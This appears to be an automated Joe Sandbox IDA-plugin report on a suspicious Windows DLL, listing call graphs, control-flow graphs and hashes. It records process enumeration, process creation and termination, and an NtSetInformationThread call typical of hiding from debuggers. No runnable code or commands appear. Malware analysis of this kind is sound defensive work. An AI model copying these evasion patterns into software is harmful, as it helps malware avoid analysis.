66614->66594 66616 6ca149c9 66615->66616 66620 6ca149cf 66615->66620 66617 6ca16b23 __Getctype 6 API calls 66616->66617 66617->66620 66618 6ca16b62 __Getctype 6 API calls 66619 6ca149ed 66618->66619 66621 6ca149d5 SetLastError 66619->66621 66622 6ca149f1 66619->66622 66620->66618 66620->66621 66626 6ca14a63 66621->66626 66627 6ca14a69 66621->66627 66623 6ca171e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 66622->66623 66625 6ca149fd 66623->66625 66628 6ca14a05 66625->66628 66629 6ca14a1c 66625->66629 66626->66606 66626->66607 66630 6ca10ac9 __Getctype 35 API calls 66627->66630 66632 6ca16b62 __Getctype 6 API calls 66628->66632 66631 6ca16b62 __Getctype 6 API calls 66629->66631 66633 6ca14a6e 66630->66633 66634 6ca14a28 66631->66634 66635 6ca14a13 66632->66635 66636 6ca14a3d 66634->66636 66637 6ca14a2c 66634->66637 66638 6ca147bb _free HeapFree GetLastError 66635->66638 66641 6ca147bb _free HeapFree GetLastError 66636->66641 66639 6ca16b62 __Getctype 6 API calls 66637->66639 66640 6ca14a19 66638->66640 66639->66635 66640->66621 66641->66640 66642->66543 66643->66549 66645 6ca1b9cd __wsopen_s 66644->66645 66653 6ca21990 EnterCriticalSection 66645->66653 66647 6ca1b9db 66648 6ca1ba08 66647->66648 66649 6ca1b925 __wsopen_s 21 API calls 66647->66649 66654 6ca1ba41 LeaveCriticalSection __wsopen_s 66648->66654 66649->66648 66651 6ca1ba2a 66651->66552 66652->66552 66653->66647 66654->66651 66655->66150 66656->66156 66657->66150 66658->66150 66659->66150 66661 6c8d022e 66660->66661 66662 6c8a70c4 66661->66662 66667 6ca117db 66661->66667 66662->66165 66664->66167 66665->66169 66666->66171 66668 6ca11806 66667->66668 66669 6ca117e9 66667->66669 66668->66661 66669->66668 66670 6ca1180a 66669->66670 66672 6ca117f6 66669->66672 66675 6ca11a02 66670->66675 66683 6ca10120 18 API calls __cftoe 66672->66683 66676 6ca11a0e __wsopen_s 66675->66676 66684 6ca0c5a9 EnterCriticalSection 66676->66684 66678 6ca11a1c 66685 6ca119bf 66678->66685 66682 6ca1183c 66682->66661 66683->66668 66684->66678 66693 6ca185a6 66685->66693 66691 6ca119f9 66692 6ca11a51 LeaveCriticalSection 66691->66692 66692->66682 66694 6ca19c60 18 API calls 66693->66694 66695 6ca185b7 66694->66695 66696 6ca219e5 __wsopen_s 18 API calls 66695->66696 66697 6ca185bd __wsopen_s 66696->66697 66699 6ca119d3 66697->66699 66710 6ca147bb HeapFree GetLastError __dosmaperr 66697->66710 66700 6ca1183e 66699->66700 66702 6ca11850 66700->66702 66704 6ca1186e 66700->66704 66701 6ca1185e 66711 6ca10120 18 API calls __cftoe 66701->66711 66702->66701 66702->66704 66708 6ca11886 _Yarn 66702->66708 66709 6ca18659 62 API calls 66704->66709 66705 6ca10cb9 62 API calls 66705->66708 66706 6ca19c60 18 API calls 66706->66708 66707 6ca1bb6c __wsopen_s 62 API calls 66707->66708 66708->66704 66708->66705 66708->66706 66708->66707 66709->66691 66710->66699 66711->66704 66713 6ca06025 66712->66713 66714 6c8d2020 52 API calls 66713->66714 66715 6ca060c6 66714->66715 66716 6ca06a43 std::_Facet_Register 4 API calls 66715->66716 66717 6ca060fe 66716->66717 66718 6ca07327 43 API calls 66717->66718 66719 6ca06112 66718->66719 66720 6c8d1d90 89 API calls 66719->66720 66722 6ca061bb 66720->66722 66721 6ca061ec 66721->66187 66722->66721 66764 6c8d2250 30 API calls 66722->66764 66724 6ca06226 66765 6c8d26e0 24 API calls 4 library calls 66724->66765 66726 6ca06238 66766 6ca09379 RaiseException 66726->66766 66728 6ca0624d 66729 6c8ce010 67 API calls 66728->66729 66730 6ca0625f 66729->66730 66730->66187 66732 6ca0638d 66731->66732 66767 6ca065a0 66732->66767 66734 6ca063a5 66736 6ca0647c 66734->66736 66785 6c8d2250 30 API calls 66734->66785 66786 6c8d26e0 24 API calls 4 library calls 66734->66786 66787 6ca09379 RaiseException 66734->66787 66736->66192 66740 6c8e203f 66739->66740 66747 6c8e2053 66740->66747 66796 6c8d3560 32 API calls std::_Xinvalid_argument 66740->66796 66743 6c8e210e 66746 6c8e2121 66743->66746 66797 6c8d37e0 32 API calls std::_Xinvalid_argument 66743->66797 66746->66192 66747->66743 66798 6c8d2250 30 API calls 66747->66798 66799 6c8d26e0 24 API calls 4 library calls 66747->66799 66800 6ca09379 RaiseException 66747->66800 66750 6ca05b9e 66749->66750 66754 6ca05bd1 66749->66754 66751 6c8d01f0 64 API calls 66750->66751 66753 6ca05bc4 66751->66753 66752 6ca05c83 66752->66198 66756 6ca10b18 67 API calls 66753->66756 66754->66752 66801 6c8d2250 30 API calls 66754->66801 66756->66754 66757 6ca05cae 66802 6c8d2340 24 API calls 66757->66802 66759 6ca05cbe 66803 6ca09379 RaiseException 66759->66803 66761 6ca05cc9 66762 6c8ce010 67 API calls 66761->66762 66763 6ca05d22 std::ios_base::_Ios_base_dtor 66762->66763 66763->66198 66764->66724 66765->66726 66766->66728 66768 6ca06608 66767->66768 66769 6ca065dc 66767->66769 66772 6ca06619 66768->66772 66788 6c8d3560 32 API calls std::_Xinvalid_argument 66768->66788 66770 6ca06601 66769->66770 66790 6c8d2250 30 API calls 66769->66790 66770->66734 66772->66770 66789 6c8d2f60 42 API calls 4 library calls 66772->66789 66774 6ca067e8 66791 6c8d2340 24 API calls 66774->66791 66776 6ca067f7 66792 6ca09379 RaiseException 66776->66792 66780 6ca06827 66794 6c8d2340 24 API calls 66780->66794 66782 6ca0683d 66795 6ca09379 RaiseException 66782->66795 66784 6ca06653 66784->66770 66793 6c8d2250 30 API calls 66784->66793 66785->66734 66786->66734 66787->66734 66788->66772 66789->66784 66790->66774 66791->66776 66792->66784 66793->66780 66794->66782 66795->66770 66796->66747 66797->66746 66798->66747 66799->66747 66800->66747 66801->66757 66802->66759 66803->66761 66804 6c894a27 66805 6c894a5d _strlen 66804->66805 66806 6c8a639e 66805->66806 66807 6c895b58 66805->66807 66808 6c895b6f 66805->66808 66812 6c895b09 _Yarn 66805->66812 66895 6ca10130 18 API calls 2 library calls 66806->66895 66810 6ca06a43 std::_Facet_Register 4 API calls 66807->66810 66811 6ca06a43 std::_Facet_Register 4 API calls 66808->66811 66810->66812 66811->66812 66813 6c9faec0 2 API calls 66812->66813 66815 6c895bad std::ios_base::_Ios_base_dtor 66813->66815 66814 6ca04ff0 4 API calls 66824 6c8961cb _strlen 66814->66824 66815->66806 66815->66814 66819 6c899ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66815->66819 66816 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66816->66819 66817 6c9faec0 2 API calls 66817->66819 66818 6c89a292 Sleep 66894 6c899bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66818->66894 66819->66806 66819->66816 66819->66817 66819->66818 66838 6c89e619 66819->66838 66820 6c89660d 66822 6ca06a43 std::_Facet_Register 4 API calls 66820->66822 66821 6c896624 66823 6ca06a43 std::_Facet_Register 4 API calls 66821->66823 66832 6c8965bc _Yarn _strlen 66822->66832 66823->66832 66824->66806 66824->66820 66824->66821 66824->66832 66825 6ca04ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66825->66894 66826 6c899bbd GetCurrentProcess TerminateProcess 66826->66819 66827 6c8a63b2 66896 6c8815e0 18 API calls std::ios_base::_Ios_base_dtor 66827->66896 66829 6c8a64f8 66830 6c896989 66834 6ca06a43 std::_Facet_Register 4 API calls 66830->66834 66831 6c896970 66833 6ca06a43 std::_Facet_Register 4 API calls 66831->66833 66832->66827 66832->66830 66832->66831 66835 6c896920 _Yarn 66832->66835 66833->66835 66834->66835 66836 6ca05960 104 API calls 66835->66836 66839 6c8969d6 std::ios_base::_Ios_base_dtor _strlen 66836->66839 66837 6c89f243 CreateFileA 66853 6c89f2a7 66837->66853 66838->66837 66839->66806 66840 6c896dbb 66839->66840 66841 6c896dd2 66839->66841 66852 6c896d69 _Yarn _strlen 66839->66852 66842 6ca06a43 std::_Facet_Register 4 API calls 66840->66842 66843 6ca06a43 std::_Facet_Register 4 API calls 66841->66843 66842->66852 66843->66852 66844 6c8a02ca 66845 6c897440 66847 6ca06a43 std::_Facet_Register 4 API calls 66845->66847 66846 6c897427 66848 6ca06a43 std::_Facet_Register 4 API calls 66846->66848 66849 6c8973da _Yarn 66847->66849 66848->66849 66850 6ca05960 104 API calls 66849->66850 66854 6c89748d std::ios_base::_Ios_base_dtor _strlen 66850->66854 66851 6c8a02ac GetCurrentProcess TerminateProcess 66851->66844 66852->66827 66852->66845 66852->66846 66852->66849 66853->66844 66853->66851 66854->66806 66855 6c8979a8 66854->66855 66856 6c897991 66854->66856 66863 6c897940 _Yarn _strlen 66854->66863 66858 6ca06a43 std::_Facet_Register 4 API calls 66855->66858 66857 6ca06a43 std::_Facet_Register 4 API calls 66856->66857 66857->66863 66858->66863 66859 6c897dc9 66861 6ca06a43 std::_Facet_Register 4 API calls 66859->66861 66860 6c897de2 66862 6ca06a43 std::_Facet_Register 4 API calls 66860->66862 66864 6c897d7c _Yarn 66861->66864 66862->66864 66863->66827 66863->66859 66863->66860 66863->66864 66865 6ca05960 104 API calls 66864->66865 66867 6c897e2f std::ios_base::_Ios_base_dtor _strlen 66865->66867 66866 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66866->66894 66867->66806 66868 6c8985a8 66867->66868 66869 6c8985bf 66867->66869 66877 6c898556 _Yarn _strlen 66867->66877 66870 6ca06a43 std::_Facet_Register 4 API calls 66868->66870 66871 6ca06a43 std::_Facet_Register 4 API calls 66869->66871 66870->66877 66871->66877 66872 6c89896a 66874 6ca06a43 std::_Facet_Register 4 API calls 66872->66874 66873 6c898983 66875 6ca06a43 std::_Facet_Register 4 API calls 66873->66875 66876 6c89891d _Yarn 66874->66876 66875->66876 66878 6ca05960 104 API calls 66876->66878 66877->66827 66877->66872 66877->66873 66877->66876 66879 6c8989d0 std::ios_base::_Ios_base_dtor _strlen 66878->66879 66879->66806 66880 6c898f1f 66879->66880 66881 6c898f36 66879->66881 66885 6c898ecd _Yarn _strlen 66879->66885 66882 6ca06a43 std::_Facet_Register 4 API calls 66880->66882 66883 6ca06a43 std::_Facet_Register 4 API calls 66881->66883 66882->66885 66883->66885 66884 6ca05960 104 API calls 66884->66894 66885->66827 66886 6c89936d 66885->66886 66887 6c899354 66885->66887 66890 6c899307 _Yarn 66885->66890 66889 6ca06a43 std::_Facet_Register 4 API calls 66886->66889 66888 6ca06a43 std::_Facet_Register 4 API calls 66887->66888 66888->66890 66889->66890 66891 6ca05960 104 API calls 66890->66891 66893 6c8993ba std::ios_base::_Ios_base_dtor 66891->66893 66892 6ca04ff0 4 API calls 66892->66819 66893->66806 66893->66892 66894->66806 66894->66819 66894->66825 66894->66826 66894->66827 66894->66866 66894->66884 66896->66829 66897 6ca0ef3f 66898 6ca0ef4b __wsopen_s 66897->66898 66899 6ca0ef52 GetLastError ExitThread 66898->66899 66900 6ca0ef5f 66898->66900 66901 6ca149b2 __Getctype 37 API calls 66900->66901 66902 6ca0ef64 66901->66902 66909 6ca19d66 66902->66909 66905 6ca0ef7b 66915 6ca0eeaa 16 API calls 2 library calls 66905->66915 66908 6ca0ef9d 66910 6ca19d78 GetPEB 66909->66910 66912 6ca0ef6f 66909->66912 66911 6ca19d8b 66910->66911 66910->66912 66916 6ca16e18 5 API calls std::_Lockit::_Lockit 66911->66916 66912->66905 66914 6ca16d6f 5 API calls std::_Lockit::_Lockit 66912->66914 66914->66905 66915->66908 66916->66912
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: HR^
                                • API String ID: 4218353326-1341859651
                                • Opcode ID: 783aff88c1bad04fc4f5f20d3f93a815b58186c1e1175d4f2992a5da97989f90
                                • Instruction ID: 7e856272003e50b2e18ec5daffb84ec278e64a44e4ec7035a0e27dc82f69ad4d
                                • Opcode Fuzzy Hash: 783aff88c1bad04fc4f5f20d3f93a815b58186c1e1175d4f2992a5da97989f90
                                • Instruction Fuzzy Hash: DD74F471645B028FC738CF28C9D0695B7F3AF95318B198E2DC0A68BE95E774B54ACB40
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: }jk$;T55$L@^
                                • API String ID: 0-4218709813
                                • Opcode ID: 314b12dda0d3f4594be8097b71436929e3ecc16aa8b726fdb8c2c5fcd0a65d8b
                                • Instruction ID: 77f1d53691e50a7fe10cf2794f18b318d226cd32cb4b8e2dd9ccce4ed379891d
                                • Opcode Fuzzy Hash: 314b12dda0d3f4594be8097b71436929e3ecc16aa8b726fdb8c2c5fcd0a65d8b
                                • Instruction Fuzzy Hash: B1340571645B018FC738CF2CC9D0A96B7E3EF95318B198E6DC0AA4BA55E734B54ACB40

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7677 6ca05240-6ca05275 CreateToolhelp32Snapshot 7678 6ca052a0-6ca052a9 7677->7678 7679 6ca052e0-6ca052e5 7678->7679 7680 6ca052ab-6ca052b0 7678->7680 7681 6ca05377-6ca053a1 call 6ca12c05 7679->7681 7682 6ca052eb-6ca052f0 7679->7682 7683 6ca052b2-6ca052b7 7680->7683 7684 6ca05315-6ca0531a 7680->7684 7681->7678 7687 6ca052f2-6ca052f7 7682->7687 7688 6ca05277-6ca05292 CloseHandle 7682->7688 7685 6ca05334-6ca0535d call 6ca0b920 Process32FirstW 7683->7685 7686 6ca052b9-6ca052be 7683->7686 7689 6ca05320-6ca05332 Process32NextW 7684->7689 7690 6ca053a6-6ca053ab 7684->7690 7695 6ca05362-6ca05372 7685->7695 7686->7678 7693 6ca052c0-6ca052d1 7686->7693 7687->7678 7694 6ca052f9-6ca05313 7687->7694 7688->7678 7689->7695 7690->7678 7692 6ca053b1-6ca053bf 7690->7692 7693->7678 7694->7678 7695->7678
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA0524E
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3332741929-0
                                • Opcode ID: 4c993e1827aaaacf8905426b3a78b5ed967c9b6e6df917e0a69fa5c87693f0a6
                                • Instruction ID: a1a15d801e20ee19c29c705c28b3509f4c4d9c60b598e1ed3af101d45c5ea0c2
                                • Opcode Fuzzy Hash: 4c993e1827aaaacf8905426b3a78b5ed967c9b6e6df917e0a69fa5c87693f0a6
                                • Instruction Fuzzy Hash: 37315C747083009FD7109F28E888B0ABBF4AF9A788F54492EE498C7360D771D8888F57

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7821 6c883886-6c88388e 7822 6c883970-6c88397d 7821->7822 7823 6c883894-6c883896 7821->7823 7824 6c88397f-6c883989 7822->7824 7825 6c8839f1-6c8839f8 7822->7825 7823->7822 7826 6c88389c-6c8838b9 7823->7826 7824->7826 7827 6c88398f-6c883994 7824->7827 7828 6c8839fe-6c883a03 7825->7828 7829 6c883ab5-6c883aba 7825->7829 7830 6c8838c0-6c8838c1 7826->7830 7833 6c88399a-6c88399f 7827->7833 7834 6c883b16-6c883b18 7827->7834 7835 6c883a09-6c883a2f 7828->7835 7836 6c8838d2-6c8838d4 7828->7836 7829->7826 7832 6c883ac0-6c883ac7 7829->7832 7831 6c88395e 7830->7831 7838 6c883960-6c883964 7831->7838 7832->7830 7839 6c883acd-6c883ad6 7832->7839 7840 6c88383b-6c883855 call 6c9d1470 call 6c9d1480 7833->7840 7841 6c8839a5-6c8839bf 7833->7841 7834->7830 7842 6c8838f8-6c883955 7835->7842 7843 6c883a35-6c883a3a 7835->7843 7837 6c883957-6c88395c 7836->7837 7837->7831 7845 6c88396a 7838->7845 7846 6c883860-6c883885 7838->7846 7839->7834 7847 6c883ad8-6c883aeb 7839->7847 7840->7846 7848 6c883a5a-6c883a5d 7841->7848 7842->7837 7849 6c883b1d-6c883b22 7843->7849 7850 6c883a40-6c883a57 7843->7850 7853 6c883ba1-6c883bb6 7845->7853 7846->7821 7847->7842 7854 6c883af1-6c883af8 7847->7854 7851 6c883aa9-6c883ab0 7848->7851 7856 6c883b49-6c883b50 7849->7856 7857 6c883b24-6c883b44 7849->7857 7850->7848 7851->7838 7858 6c883bc0-6c883bda call 6c9d1470 call 6c9d1480 7853->7858 7860 6c883afa-6c883aff 7854->7860 7861 6c883b62-6c883b85 7854->7861 7856->7830 7864 6c883b56-6c883b5d 7856->7864 7857->7851 7872 6c883be0-6c883bfe 7858->7872 7860->7837 7861->7842 7868 6c883b8b 7861->7868 7864->7838 7868->7853 7875 6c883e7b 7872->7875 7876 6c883c04-6c883c11 7872->7876 7877 6c883e81-6c883ee0 call 6c883750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6c883ce0-6c883cea 7876->7878 7879 6c883c17-6c883c20 7876->7879 7892 6c883eea-6c883f04 call 6c9d1470 call 6c9d1480 7877->7892 7881 6c883d3a-6c883d3c 7878->7881 7882 6c883cec-6c883d0c 7878->7882 7883 6c883dc5 7879->7883 7884 6c883c26-6c883c2d 7879->7884 7887 6c883d3e-6c883d45 7881->7887 7888 6c883d70-6c883d8d 7881->7888 7886 6c883d90-6c883d95 7882->7886 7889 6c883dc6 7883->7889 7890 6c883dc3 7884->7890 7891 6c883c33-6c883c3a 7884->7891 7894 6c883dba-6c883dc1 7886->7894 7895 6c883d97-6c883db8 7886->7895 7893 6c883d50-6c883d57 7887->7893 7888->7886 7896 6c883dc8-6c883dcc 7889->7896 7890->7883 7897 6c883c40-6c883c5b 7891->7897 7898 6c883e26-6c883e2b 7891->7898 7915 6c883f75-6c883fa1 7892->7915 7893->7889 7894->7890 7900 6c883dd7-6c883ddc 7894->7900 7895->7883 7896->7872 7901 6c883dd2 7896->7901 7902 6c883e1b-6c883e24 7897->7902 7903 6c883c7b-6c883cd0 7898->7903 7904 6c883e31 7898->7904 7907 6c883dde-6c883e17 7900->7907 7908 6c883e36-6c883e3d 7900->7908 7905 6c883e76-6c883e79 7901->7905 7902->7896 7902->7905 7903->7893 7904->7858 7905->7877 7907->7902 7909 6c883e5c-6c883e5f 7908->7909 7910 6c883e3f-6c883e5a 7908->7910 7909->7903 7913 6c883e65-6c883e69 7909->7913 7910->7902 7913->7896 7913->7905 7919 6c884020-6c884026 7915->7919 7920 6c883fa3-6c883fa8 7915->7920 7921 6c88402c-6c88403c 7919->7921 7922 6c883f06-6c883f35 7919->7922 7923 6c88407c-6c884081 7920->7923 7924 6c883fae-6c883fcf 7920->7924 7926 6c88403e-6c884058 7921->7926 7927 6c8840b3-6c8840b8 7921->7927 7925 6c883f38-6c883f61 7922->7925 7928 6c8840aa-6c8840ae 7923->7928 7929 6c884083-6c88408a 7923->7929 7924->7928 7932 6c883f64-6c883f67 7925->7932 7933 6c88405a-6c884063 7926->7933 7927->7924 7931 6c8840be-6c8840c9 7927->7931 7934 6c883f6b-6c883f6f 7928->7934 7929->7925 7930 6c884090 7929->7930 7930->7892 7935 6c8840a7 7930->7935 7931->7928 7936 6c8840cb-6c8840d4 7931->7936 7937 6c883f69 7932->7937 7938 6c884069-6c88406c 7933->7938 7939 6c8840f5-6c88413f 7933->7939 7934->7915 7935->7928 7936->7935 7940 6c8840d6-6c8840f0 7936->7940 7937->7934 7942 6c884072-6c884077 7938->7942 7943 6c884144-6c88414b 7938->7943 7939->7937 7940->7933 7942->7932 7943->7934
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb17ca5915741ba5ff66a79ad32258ba904c0ca3c9249261eb59741a8235bd26
                                • Instruction ID: bf3516fd04d323937fb0557788bc20f21e9b5cbeec297bb78cc3d390802de950
                                • Opcode Fuzzy Hash: eb17ca5915741ba5ff66a79ad32258ba904c0ca3c9249261eb59741a8235bd26
                                • Instruction Fuzzy Hash: 5732B132246B018FC334CF28C990696B7E3EFD131476A8E6DC0AA5BE55D775B84ACB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7969 6c883a6a-6c883a85 7970 6c883a87-6c883aa7 7969->7970 7971 6c883aa9-6c883ab0 7970->7971 7972 6c883960-6c883964 7971->7972 7973 6c88396a 7972->7973 7974 6c883860-6c88388e 7972->7974 7975 6c883ba1-6c883bb6 7973->7975 7984 6c883970-6c88397d 7974->7984 7985 6c883894-6c883896 7974->7985 7977 6c883bc0-6c883bda call 6c9d1470 call 6c9d1480 7975->7977 7990 6c883be0-6c883bfe 7977->7990 7987 6c88397f-6c883989 7984->7987 7988 6c8839f1-6c8839f8 7984->7988 7985->7984 7989 6c88389c-6c8838b9 7985->7989 7987->7989 7991 6c88398f-6c883994 7987->7991 7992 6c8839fe-6c883a03 7988->7992 7993 6c883ab5-6c883aba 7988->7993 7994 6c8838c0-6c8838c1 7989->7994 8011 6c883e7b 7990->8011 8012 6c883c04-6c883c11 7990->8012 7998 6c88399a-6c88399f 7991->7998 7999 6c883b16-6c883b18 7991->7999 8000 6c883a09-6c883a2f 7992->8000 8001 6c8838d2-6c8838d4 7992->8001 7993->7989 7996 6c883ac0-6c883ac7 7993->7996 7995 6c88395e 7994->7995 7995->7972 7996->7994 8003 6c883acd-6c883ad6 7996->8003 8005 6c88383b-6c883855 call 6c9d1470 call 6c9d1480 7998->8005 8006 6c8839a5-6c8839bf 7998->8006 7999->7994 8007 6c8838f8-6c883955 8000->8007 8008 6c883a35-6c883a3a 8000->8008 8002 6c883957-6c88395c 8001->8002 8002->7995 8003->7999 8010 6c883ad8-6c883aeb 8003->8010 8005->7974 8013 6c883a5a-6c883a5d 8006->8013 8007->8002 8014 6c883b1d-6c883b22 8008->8014 8015 6c883a40-6c883a57 8008->8015 8010->8007 8018 6c883af1-6c883af8 8010->8018 8017 6c883e81-6c883ee0 call 6c883750 GetCurrentThread NtSetInformationThread 8011->8017 8019 6c883ce0-6c883cea 8012->8019 8020 6c883c17-6c883c20 8012->8020 8013->7971 8021 6c883b49-6c883b50 8014->8021 8022 6c883b24-6c883b44 8014->8022 8015->8013 8041 6c883eea-6c883f04 call 6c9d1470 call 6c9d1480 8017->8041 8027 6c883afa-6c883aff 8018->8027 8028 6c883b62-6c883b85 8018->8028 8024 6c883d3a-6c883d3c 8019->8024 8025 6c883cec-6c883d0c 8019->8025 8029 6c883dc5 8020->8029 8030 6c883c26-6c883c2d 8020->8030 8021->7994 8031 6c883b56-6c883b5d 8021->8031 8022->7970 8034 6c883d3e-6c883d45 8024->8034 8035 6c883d70-6c883d8d 8024->8035 8033 6c883d90-6c883d95 8025->8033 8027->8002 8028->8007 8040 6c883b8b 8028->8040 8036 6c883dc6 8029->8036 8038 6c883dc3 8030->8038 8039 6c883c33-6c883c3a 8030->8039 8031->7972 8043 6c883dba-6c883dc1 8033->8043 8044 6c883d97-6c883db8 8033->8044 8042 6c883d50-6c883d57 8034->8042 8035->8033 8045 6c883dc8-6c883dcc 8036->8045 8038->8029 8046 6c883c40-6c883c5b 8039->8046 8047 6c883e26-6c883e2b 8039->8047 8040->7975 8064 6c883f75-6c883fa1 8041->8064 8042->8036 8043->8038 8049 6c883dd7-6c883ddc 8043->8049 8044->8029 8045->7990 8050 6c883dd2 8045->8050 8051 6c883e1b-6c883e24 8046->8051 8052 6c883c7b-6c883cd0 8047->8052 8053 6c883e31 8047->8053 8056 6c883dde-6c883e17 8049->8056 8057 6c883e36-6c883e3d 8049->8057 8054 6c883e76-6c883e79 8050->8054 8051->8045 8051->8054 8052->8042 8053->7977 8054->8017 8056->8051 8058 6c883e5c-6c883e5f 8057->8058 8059 6c883e3f-6c883e5a 8057->8059 8058->8052 8062 6c883e65-6c883e69 8058->8062 8059->8051 8062->8045 8062->8054 8068 6c884020-6c884026 8064->8068 8069 6c883fa3-6c883fa8 8064->8069 8070 6c88402c-6c88403c 8068->8070 8071 6c883f06-6c883f35 8068->8071 8072 6c88407c-6c884081 8069->8072 8073 6c883fae-6c883fcf 8069->8073 8075 6c88403e-6c884058 8070->8075 8076 6c8840b3-6c8840b8 8070->8076 8074 6c883f38-6c883f61 8071->8074 8077 6c8840aa-6c8840ae 8072->8077 8078 6c884083-6c88408a 8072->8078 8073->8077 8081 6c883f64-6c883f67 8074->8081 8082 6c88405a-6c884063 8075->8082 8076->8073 8080 6c8840be-6c8840c9 8076->8080 8083 6c883f6b-6c883f6f 8077->8083 8078->8074 8079 6c884090 8078->8079 8079->8041 8084 6c8840a7 8079->8084 8080->8077 8085 6c8840cb-6c8840d4 8080->8085 8086 6c883f69 8081->8086 8087 6c884069-6c88406c 8082->8087 8088 6c8840f5-6c88413f 8082->8088 8083->8064 8084->8077 8085->8084 8089 6c8840d6-6c8840f0 8085->8089 8086->8083 8091 6c884072-6c884077 8087->8091 8092 6c884144-6c88414b 8087->8092 8088->8086 8089->8082 8091->8081 8092->8083
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 22496e597871edaeb170921646d8ec428c80d212556bb01f350a632f7f15cfa3
